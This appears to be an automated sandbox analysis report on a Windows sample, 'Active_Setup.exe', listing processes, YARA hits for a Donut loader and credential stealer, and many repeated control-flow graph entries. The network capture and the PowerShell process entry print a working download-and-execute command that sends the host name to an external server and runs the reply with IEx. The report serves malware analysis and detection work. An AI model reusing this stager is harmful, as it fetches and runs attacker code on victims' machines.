Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT
Connection: close
ETag: "676c9e2a-149"
Accept-Ranges: bytes
2024-12-30 17:19:26 UTC | 329 | IN | Data Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e
Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.


Target ID: 0
Start time: 12:19:01
Start date: 30/12/2024
Path: C:\Users\user\Desktop\Active_Setup.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Active_Setup.exe"
Imagebase: 0xfb0000
File size: 76'054'693 bytes
MD5 hash: B106A3A66916985D5E5B6CBBB6C5B07C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1860274897.0000000000BD4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 4
Start time: 12:19:26
Start date: 30/12/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ;
Imagebase: 0x550000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 12:19:26
Start date: 30/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true


Execution Graph

Execution Coverage: 0.4%
Dynamic/Decrypted Code Coverage: 33.1%
Signature Coverage: 18%
Total number of Nodes: 278
Total number of Limit Nodes: 25
APIs
• NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 0098E912
• NtMapViewOfSection.NTDLL(?,00000000), ref: 0098E9BA
• VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0098ED2E
• NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 0098EDE3
• VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 0098EE00
• VirtualProtect.KERNEL32(?,?,?,00000000), ref: 0098EEA3
• VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 0098EED6
• CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0098F047
Memory Dump Source
• Source File: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_940000_Active_Setup.jbxd
Yara matches
Similarity
• API ID: Virtual$ProtectSection$CreateView$AllocThread
• String ID:
• API String ID: 1248616170-0
• Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
• Instruction ID: 1f58359a5a4e5510a1b04b10f154e57abe518bf5307f5f17d20d2da117bdf73f
• Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
• Instruction Fuzzy Hash: 09427A71608301AFDB24EF24C894B6BBBE9EF88714F14492DF9859B352D774E844CB92

Control-flow Graph

APIs
• GetModuleHandleA.KERNEL32(?,32C11320,-CEDBFD1E,?,00FB186C,?,?,?,?,?,?,?,?,?,00FB2322,?), ref: 00FB6407
• GetProcAddress.KERNEL32(00000000), ref: 00FB6D7B
• VirtualAlloc.KERNEL32(-0000000246944B8E,0004FC08,?,?,?,?,?,-88E75856,?,?,00FB186C,?), ref: 00FB74B0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID: AddressAllocHandleModuleProcVirtual
• String ID: &}
• API String ID: 3695083113-4269328691
• Opcode ID: 6324e6d7eeb3e654a3988c80ad590216492534640b720c9bcc6e5089f54fa71a
• Instruction ID: da657e0da85bef76784a5ab78467e18b527b18fc367067e27ab3a243df1b57c0
• Opcode Fuzzy Hash: 6324e6d7eeb3e654a3988c80ad590216492534640b720c9bcc6e5089f54fa71a
• Instruction Fuzzy Hash: 17C212729103258FD768EFB6EC9B16A37A2FB90310346822ED4C29794DDF3F54468B81

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,32C11320,-CEDBFD1E,?,00FB186C,?,?,?,?,?,?,?,?,?,00FB2322,?), ref: 00FB6407
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00FB6D7B
                                                                                                                                                  • VirtualAlloc.KERNEL32(-0000000246944B8E,0004FC08,?,?,?,?,?,-88E75856,?,?,00FB186C,?), ref: 00FB74B0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressAllocHandleModuleProcVirtual
                                                                                                                                                  • String ID: &}
                                                                                                                                                  • API String ID: 3695083113-4269328691
                                                                                                                                                  • Opcode ID: 752134e146b48c48140c41fde780d084702e5d1fe8b66aedfacefd78eea36061
                                                                                                                                                  • Instruction ID: e3cd45b6d111c358327a2f5cce2cec8344d79bfc58dd08da06ee8ec82705bd34
                                                                                                                                                  • Opcode Fuzzy Hash: 752134e146b48c48140c41fde780d084702e5d1fe8b66aedfacefd78eea36061
                                                                                                                                                  • Instruction Fuzzy Hash: 00C212729143258FD768EFB6EC9B16A37A2FB90310346822ED4C29794DDF3F54468B81

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  control_flow_graph 267 fb6100-fb781c call ff8976 call ffa708 call 101895d call 1050a74 call fe57ef call fd86d3 call 107c20e call fb3829 call 1083eef call 105595d call 102d296 call 10448ab call 1062867 call 1013537 GetModuleHandleA call 1076e67 call 102f45f call 102e8ca call fde69d call fcb730 call fc4134 call 103f1ca call 103fa0d call ffb542 call ff95d7 call fd4c96 call 1054d24 call fbf707 call fcb5c6 call 10448ab call 107bcda call fed105 call fd4ba0 call fd79df call 1062867 call fb8321 call 105c038 call fe3574 call 1063a7f call fcc0f9 call 106d2b1 call fb7833 call fbc6ae call 10598b0 call 1064b08 call fb49dc call 100d313 call 1076630 call fc75cd call fc1acd call fd1d27 call 1057415 call fffdab call fdcc9c call 103b8e7 call 101f581 call fb9fe1 call 101eed9 call 107f69e call fe53ae call fee63e call 1050193 call fe1970 call 1013e51 call 106802c call ff204a call ff4092 call 10047c4 call ffccda call 1072e16 call 1053626 call 101a928 call ffb979 call 107c780 call 108481c call fc0b9c call 1055a07 call ff72f1 call 10390c4 call 1064044 call fc8a6d call fe950b GetProcAddress call 107a7f2 call 106d2b1 call 106500c call fbe000 call 10180c7 call ffe77d call fe94ad call 1044ba5 call 1013c41 call fda924 call 103720e call 101623d call fe7efd call fc5dc6 call fbb75c call 103032a call 10358d2 call fd3d25 call fbf3ab call 10267c7 call 102c5de call fc24ce call ff0af1 call 10800d0 call fd2157 call 10218e0 call 10614fa call 102b29d call 10128d2 call 103ebed call 100e3f2 call 105eb3d call 100f34c call 1082526 call 10819e8 call fed3cc call fb3454 call 103d2f7 call 101d286 call 102e059 call 1013ad8 call 1081da9 call 1030c06 call 10383e2 call fd9079 call 107535f call fd9079 call fe8466 call 104c810 call ffd484 call 101f98f call 1006a56 call 106296d call fcd14a call ffecab call 1033f2a call fba22a VirtualAlloc call 1000f3a call 101705d call fb2b96 
call 103032a call fe8008 call 10791b4 call fd1d27 call 105ecb5 call ffb2a2 call 1023cf3 call 1071d9b call 1067514 call fe1970 call ff1eee call fd548b call 1058154 call 10724a1 call 1075bc7 call 10850a8 call 1055b86 call 106a897 call 10850f6 call fe6e28 call 100b9c0 call fb3e0c 601 fb782e-fb7844 call fb7360 267->601 602 fb781e-fb7821 267->602 608 fb7863-fb786b 601->608 609 fb7846-fb7862 601->609 602->601 604 fb7823-fb782b call fca3c0 602->604 604->601
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,32C11320,-CEDBFD1E,?,00FB186C,?,?,?,?,?,?,?,?,?,00FB2322,?), ref: 00FB6407
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00FB6D7B
                                                                                                                                                  • VirtualAlloc.KERNEL32(-0000000246944B8E,0004FC08,?,?,?,?,?,-88E75856,?,?,00FB186C,?), ref: 00FB74B0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressAllocHandleModuleProcVirtual
                                                                                                                                                  • String ID: &}
                                                                                                                                                  • API String ID: 3695083113-4269328691
                                                                                                                                                  • Opcode ID: fd3c2f8683a0041264ed4eccda7e5fc52cba84f5d06e227d5a084a6b770aa038
                                                                                                                                                  • Instruction ID: e7e75ca89b0517da6bb5e1cb16bc9d4c0f73ffb79acbf040268c0f060f1a1b55
                                                                                                                                                  • Opcode Fuzzy Hash: fd3c2f8683a0041264ed4eccda7e5fc52cba84f5d06e227d5a084a6b770aa038
                                                                                                                                                  • Instruction Fuzzy Hash: 6BB211729143258FD768EFB6EC9B16A37A2FB90310346822ED4C29794DDF3F54468B81

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  control_flow_graph 611 fb6160-fb781c call ff8976 call ffa708 call 101895d call 1050a74 call fe57ef call fd86d3 call 107c20e call fb3829 call 1083eef call 105595d call 102d296 call 10448ab call 1062867 call 1013537 GetModuleHandleA call 1076e67 call 102f45f call 102e8ca call fde69d call fcb730 call fc4134 call 103f1ca call 103fa0d call ffb542 call ff95d7 call fd4c96 call 1054d24 call fbf707 call fcb5c6 call 10448ab call 107bcda call fed105 call fd4ba0 call fd79df call 1062867 call fb8321 call 105c038 call fe3574 call 1063a7f call fcc0f9 call 106d2b1 call fb7833 call fbc6ae call 10598b0 call 1064b08 call fb49dc call 100d313 call 1076630 call fc75cd call fc1acd call fd1d27 call 1057415 call fffdab call fdcc9c call 103b8e7 call 101f581 call fb9fe1 call 101eed9 call 107f69e call fe53ae call fee63e call 1050193 call fe1970 call 1013e51 call 106802c call ff204a call ff4092 call 10047c4 call ffccda call 1072e16 call 1053626 call 101a928 call ffb979 call 107c780 call 108481c call fc0b9c call 1055a07 call ff72f1 call 10390c4 call 1064044 call fc8a6d call fe950b GetProcAddress call 107a7f2 call 106d2b1 call 106500c call fbe000 call 10180c7 call ffe77d call fe94ad call 1044ba5 call 1013c41 call fda924 call 103720e call 101623d call fe7efd call fc5dc6 call fbb75c call 103032a call 10358d2 call fd3d25 call fbf3ab call 10267c7 call 102c5de call fc24ce call ff0af1 call 10800d0 call fd2157 call 10218e0 call 10614fa call 102b29d call 10128d2 call 103ebed call 100e3f2 call 105eb3d call 100f34c call 1082526 call 10819e8 call fed3cc call fb3454 call 103d2f7 call 101d286 call 102e059 call 1013ad8 call 1081da9 call 1030c06 call 10383e2 call fd9079 call 107535f call fd9079 call fe8466 call 104c810 call ffd484 call 101f98f call 1006a56 call 106296d call fcd14a call ffecab call 1033f2a call fba22a VirtualAlloc call 1000f3a call 101705d call fb2b96 
call 103032a call fe8008 call 10791b4 call fd1d27 call 105ecb5 call ffb2a2 call 1023cf3 call 1071d9b call 1067514 call fe1970 call ff1eee call fd548b call 1058154 call 10724a1 call 1075bc7 call 10850a8 call 1055b86 call 106a897 call 10850f6 call fe6e28 call 100b9c0 call fb3e0c 944 fb782e-fb7844 call fb7360 611->944 945 fb781e-fb7821 611->945 951 fb7863-fb786b 944->951 952 fb7846-fb7862 944->952 945->944 947 fb7823-fb782b call fca3c0 945->947 947->944
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,32C11320,-CEDBFD1E,?,00FB186C,?,?,?,?,?,?,?,?,?,00FB2322,?), ref: 00FB6407
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00FB6D7B
                                                                                                                                                  • VirtualAlloc.KERNEL32(-0000000246944B8E,0004FC08,?,?,?,?,?,-88E75856,?,?,00FB186C,?), ref: 00FB74B0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressAllocHandleModuleProcVirtual
                                                                                                                                                  • String ID: &}
                                                                                                                                                  • API String ID: 3695083113-4269328691
                                                                                                                                                  • Opcode ID: 3f59bcde187c8dacf14645bdd4c8eb5e1ee94fcf9304d523a502149f9781a2ba
                                                                                                                                                  • Instruction ID: 299a453a8f66760380cf6eeb136ff896ea5bfaec62eb3ade3290412d1434849c
                                                                                                                                                  • Opcode Fuzzy Hash: 3f59bcde187c8dacf14645bdd4c8eb5e1ee94fcf9304d523a502149f9781a2ba
                                                                                                                                                  • Instruction Fuzzy Hash: E7B211729143258FD768EFB6EC9B16A37A2FB90300346822ED4C29794DDF3F54469B81

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  control_flow_graph 954 fb6180-fb781c call ff8976 call ffa708 call 101895d call 1050a74 call fe57ef call fd86d3 call 107c20e call fb3829 call 1083eef call 105595d call 102d296 call 10448ab call 1062867 call 1013537 GetModuleHandleA call 1076e67 call 102f45f call 102e8ca call fde69d call fcb730 call fc4134 call 103f1ca call 103fa0d call ffb542 call ff95d7 call fd4c96 call 1054d24 call fbf707 call fcb5c6 call 10448ab call 107bcda call fed105 call fd4ba0 call fd79df call 1062867 call fb8321 call 105c038 call fe3574 call 1063a7f call fcc0f9 call 106d2b1 call fb7833 call fbc6ae call 10598b0 call 1064b08 call fb49dc call 100d313 call 1076630 call fc75cd call fc1acd call fd1d27 call 1057415 call fffdab call fdcc9c call 103b8e7 call 101f581 call fb9fe1 call 101eed9 call 107f69e call fe53ae call fee63e call 1050193 call fe1970 call 1013e51 call 106802c call ff204a call ff4092 call 10047c4 call ffccda call 1072e16 call 1053626 call 101a928 call ffb979 call 107c780 call 108481c call fc0b9c call 1055a07 call ff72f1 call 10390c4 call 1064044 call fc8a6d call fe950b GetProcAddress call 107a7f2 call 106d2b1 call 106500c call fbe000 call 10180c7 call ffe77d call fe94ad call 1044ba5 call 1013c41 call fda924 call 103720e call 101623d call fe7efd call fc5dc6 call fbb75c call 103032a call 10358d2 call fd3d25 call fbf3ab call 10267c7 call 102c5de call fc24ce call ff0af1 call 10800d0 call fd2157 call 10218e0 call 10614fa call 102b29d call 10128d2 call 103ebed call 100e3f2 call 105eb3d call 100f34c call 1082526 call 10819e8 call fed3cc call fb3454 call 103d2f7 call 101d286 call 102e059 call 1013ad8 call 1081da9 call 1030c06 call 10383e2 call fd9079 call 107535f call fd9079 call fe8466 call 104c810 call ffd484 call 101f98f call 1006a56 call 106296d call fcd14a call ffecab call 1033f2a call fba22a VirtualAlloc call 1000f3a call 101705d call fb2b96 
call 103032a call fe8008 call 10791b4 call fd1d27 call 105ecb5 call ffb2a2 call 1023cf3 call 1071d9b call 1067514 call fe1970 call ff1eee call fd548b call 1058154 call 10724a1 call 1075bc7 call 10850a8 call 1055b86 call 106a897 call 10850f6 call fe6e28 call 100b9c0 call fb3e0c 1287 fb782e-fb7844 call fb7360 954->1287 1288 fb781e-fb7821 954->1288 1294 fb7863-fb786b 1287->1294 1295 fb7846-fb7862 1287->1295 1288->1287 1290 fb7823-fb782b call fca3c0 1288->1290 1290->1287
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,32C11320,-CEDBFD1E,?,00FB186C,?,?,?,?,?,?,?,?,?,00FB2322,?), ref: 00FB6407
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00FB6D7B
                                                                                                                                                  • VirtualAlloc.KERNEL32(-0000000246944B8E,0004FC08,?,?,?,?,?,-88E75856,?,?,00FB186C,?), ref: 00FB74B0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressAllocHandleModuleProcVirtual
                                                                                                                                                  • String ID: &}
                                                                                                                                                  • API String ID: 3695083113-4269328691
                                                                                                                                                  • Opcode ID: 4585b0e3c8a223188c8d0f80dda1459872d2b09e0fabaf7008015be5ee7c5128
                                                                                                                                                  • Instruction ID: 563e7f087a0365d8449039f6d3bb465768c4b74c146cd2fdf6290e8eaa949fe2
                                                                                                                                                  • Opcode Fuzzy Hash: 4585b0e3c8a223188c8d0f80dda1459872d2b09e0fabaf7008015be5ee7c5128
                                                                                                                                                  • Instruction Fuzzy Hash: 38B212729143258FD768EFB6EC9B16A37A2FB90300346822ED4C29794DDF3F54469B81

Control-flow Graph

control_flow_graph 1297 fb6350-fb781c call 102d296 call 10448ab call 1062867 call 1013537 GetModuleHandleA call 1076e67 call 102f45f call 102e8ca call fde69d call fcb730 call fc4134 call 103f1ca call 103fa0d call ffb542 call ff95d7 call fd4c96 call 1054d24 call fbf707 call fcb5c6 call 10448ab call 107bcda call fed105 call fd4ba0 call fd79df call 1062867 call fb8321 call 105c038 call fe3574 call 1063a7f call fcc0f9 call 106d2b1 call fb7833 call fbc6ae call 10598b0 call 1064b08 call fb49dc call 100d313 call 1076630 call fc75cd call fc1acd call fd1d27 call 1057415 call fffdab call fdcc9c call 103b8e7 call 101f581 call fb9fe1 call 101eed9 call 107f69e call fe53ae call fee63e call 1050193 call fe1970 call 1013e51 call 106802c call ff204a call ff4092 call 10047c4 call ffccda call 1072e16 call 1053626 call 101a928 call ffb979 call 107c780 call 108481c call fc0b9c call 1055a07 call ff72f1 call 10390c4 call 1064044 call fc8a6d call fe950b GetProcAddress call 107a7f2 call 106d2b1 call 106500c call fbe000 call 10180c7 call ffe77d call fe94ad call 1044ba5 call 1013c41 call fda924 call 103720e call 101623d call fe7efd call fc5dc6 call fbb75c call 103032a call 10358d2 call fd3d25 call fbf3ab call 10267c7 call 102c5de call fc24ce call ff0af1 call 10800d0 call fd2157 call 10218e0 call 10614fa call 102b29d call 10128d2 call 103ebed call 100e3f2 call 105eb3d call 100f34c call 1082526 call 10819e8 call fed3cc call fb3454 call 103d2f7 call 101d286 call 102e059 call 1013ad8 call 1081da9 call 1030c06 call 10383e2 call fd9079 call 107535f call fd9079 call fe8466 call 104c810 call ffd484 call 101f98f call 1006a56 call 106296d call fcd14a call ffecab call 1033f2a call fba22a VirtualAlloc call 1000f3a call 101705d call fb2b96 call 103032a call fe8008 call 10791b4 call fd1d27 call 105ecb5 call ffb2a2 call 1023cf3 call 1071d9b call 1067514 call fe1970 call ff1eee call fd548b call 1058154 call 10724a1 call 1075bc7 call 10850a8 call 1055b86 call 106a897 call 10850f6 call fe6e28 call 100b9c0 call fb3e0c 1608 fb782e-fb7844 call fb7360 1297->1608 1609 fb781e-fb7821 1297->1609 1615 fb7863-fb786b 1608->1615 1616 fb7846-fb7862 1608->1616 1609->1608 1611 fb7823-fb782b call fca3c0 1609->1611 1611->1608
APIs
• GetModuleHandleA.KERNEL32(?,32C11320,-CEDBFD1E,?,00FB186C,?,?,?,?,?,?,?,?,?,00FB2322,?), ref: 00FB6407
• GetProcAddress.KERNEL32(00000000), ref: 00FB6D7B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: &}
• API String ID: 1646373207-4269328691
• Opcode ID: 078b5e00d947b0cc57e86eec01e2bb0b217662aaa554f051ae52369f79c42630
• Instruction ID: b46f1b7eb3f2d793c6252c6cca99bb841a2625c66294258b9e0e8464b79165eb
• Opcode Fuzzy Hash: 078b5e00d947b0cc57e86eec01e2bb0b217662aaa554f051ae52369f79c42630
• Instruction Fuzzy Hash: 81A213729043258FD768EF75EC9B16A37A2FB90300386862ED4C29794DDF3F54469B81

Control-flow Graph

